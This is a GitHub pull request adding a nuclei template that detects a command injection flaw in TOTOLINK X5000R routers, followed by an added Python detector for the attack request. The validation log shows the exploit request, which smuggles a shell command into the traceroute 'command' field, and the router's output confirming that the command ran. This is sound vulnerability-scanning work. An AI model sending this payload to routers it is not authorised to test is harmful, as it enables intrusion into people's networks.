Create CVE-2023-30013.yaml #8293

Merged 2 commits on Oct 10, 2023

Contributor

@gy741 gy741 commented Sep 30, 2023

Template / PR Information

Hello,

Added CVE-2023-30013

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

Template Validation

I've validated this template locally?

  • YES
  • NO

$ nuclei -t CVE-2023-30013.yaml -u http://192.168.0.1 --debug

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.4; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

{"command":"127.0.0.1; ls>../2W7n8eYnm8kR6cuEzZkIWLLfoQS;#","num":"230","topicurl":"setTracerouteCfg"}
[DBG] [CVE-2023-30013] Dumped HTTP response http://192.168.0.1/cgi-bin/cstecgi.cgi

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Date: Wed, 30 Sep 2015 16:45:26 GMT
Server: lighttpd/1.4.20

traceroute to 127.0.0.1 (127.0.0.1), 230 hops max, 38 byte packets
 1  localhost.localdomain (127.0.0.1)  2.265 ms  0.166 ms  0.678 ms
{
        "success":      true,
        "error":        null,
        "lan_ip":       "192.168.0.1",
        "wtime":        "0",
        "reserv":       "reserv"
}
[INF] [CVE-2023-30013] Dumped HTTP request for http://192.168.0.1/2W7n8eYnm8kR6cuEzZkIWLLfoQS

GET /2W7n8eYnm8kR6cuEzZkIWLLfoQS HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2023-30013] Dumped HTTP response http://192.168.0.1/2W7n8eYnm8kR6cuEzZkIWLLfoQS

HTTP/1.1 200 OK
Connection: close
Content-Length: 41
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Wed, 30 Sep 2015 16:45:26 GMT
Etag: "878264423"
Last-Modified: Wed, 30 Sep 2015 16:45:26 GMT
Server: lighttpd/1.4.20


00000000  45 78 70 6f 72 74 53 65  74 74 69 6e 67 73 2e 73  |ExportSettings.s|
00000010  68 0a 63 73 74 65 63 67  69 2e 63 67 69 0a 63 75  |h.cstecgi.cgi.cu|
00000020  73 74 6f 6d 2e 63 67 69  0a                       |stom.cgi.|
[CVE-2023-30013:word-1] [http] [critical] http://192.168.0.1/2W7n8eYnm8kR6cuEzZkIWLLfoQS
[CVE-2023-30013:status-2] [http] [critical] http://192.168.0.1/2W7n8eYnm8kR6cuEzZkIWLLfoQS

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.

Signed-off-by: GwanYeong Kim <[email protected]>
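
A defender-side check for the request shown in the debug output above, added here as an example that is not part of the PR or the nuclei template: it flags setTracerouteCfg POST bodies whose "command" value is anything other than a bare hostname or IP address. The function names and the benign sample body are assumptions made for the illustration.

```python
import ipaddress
import json
import re

CGI_PATH = "/cgi-bin/cstecgi.cgi"  # endpoint shown in the debug output
# Hostname or dotted IPv4: labels of letters, digits and inner hyphens only.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOST = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")

def is_plain_target(value):
    """True only for a bare hostname, IPv4 address or IPv6 address."""
    if not isinstance(value, str) or not 0 < len(value) <= 253:
        return False
    if _HOST.fullmatch(value):
        return True
    if "%" in value:  # IPv6 scope ids may carry arbitrary text, so refuse them
        return False
    try:
        ipaddress.IPv6Address(value)
    except ValueError:
        return False
    return True

def inspect_request(path, body):
    """Classify one POST: 'ignore' (other traffic), 'ok' or 'alert'."""
    if path != CGI_PATH:
        return "ignore"
    try:
        # Keep objects as tuples of (key, value) pairs so that duplicate keys
        # stay visible; a dict would silently keep only the last one.
        msg = json.loads(body, object_pairs_hook=tuple)
    except ValueError:
        return "ignore"
    if not isinstance(msg, tuple):
        return "ignore"
    topics = [v for k, v in msg if k == "topicurl"]
    commands = [v for k, v in msg if k == "command"]
    if "setTracerouteCfg" not in topics:
        return "ignore"
    return "ok" if all(is_plain_target(c) for c in commands) else "alert"

# Request body copied from the debug output on this page.
PAGE_BODY = '{"command":"127.0.0.1; ls>../2W7n8eYnm8kR6cuEzZkIWLLfoQS;#","num":"230","topicurl":"setTracerouteCfg"}'
# Constructed sample: an ordinary traceroute request.
BENIGN_BODY = '{"command":"192.168.0.254","num":"30","topicurl":"setTracerouteCfg"}'

if __name__ == "__main__":
    for body in (PAGE_BODY, BENIGN_BODY):
        print(inspect_request(CGI_PATH, body), body)
```

The same allowlist, applied on the device before the value reaches the traceroute invocation, is the input validation this endpoint lacks.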
@pussycat0x pussycat0x self-assigned this Oct 1, 2023
@pussycat0x pussycat0x added the Done Ready to merge label Oct 10, 2023
@DhiyaneshGeek DhiyaneshGeek merged commit 9db41d5 into projectdiscovery:main Oct 10, 2023
2 checks passed
@DhiyaneshGeek
Member

Hi @gy741, thank you so much for sharing this template with the community.
